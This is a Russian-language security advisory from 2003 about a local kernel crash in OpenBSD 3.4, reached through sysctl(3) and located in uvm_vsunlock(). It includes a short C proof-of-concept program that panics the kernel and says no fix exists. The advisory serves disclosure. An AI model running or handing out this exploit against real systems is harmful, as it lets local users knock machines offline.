Security Lab

Локальный отказ в обслуживании в ядре OpenBSD

Дата публикации:24.11.2003
Всего просмотров:1498
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
strong>Уязвимые версии: OpenBSD 3.4

Описание: Уязвимость обнаружена в OpenBSD в функции sysctl(3). Локальный пользователь может аварийно завершить работу системы.

Локальный пользователь может вызвать sysctl(3) со специально сформированными параметрами, чтобы аварийно завершить работу ядра.

Недостаток расположен в 'uvm_glue.c' в uvm_vsunlock().

Пример/Эксплоит:

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

URL производителя: http://www.openbsd.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: OpenBSD kernel panic, yet still O*BSD much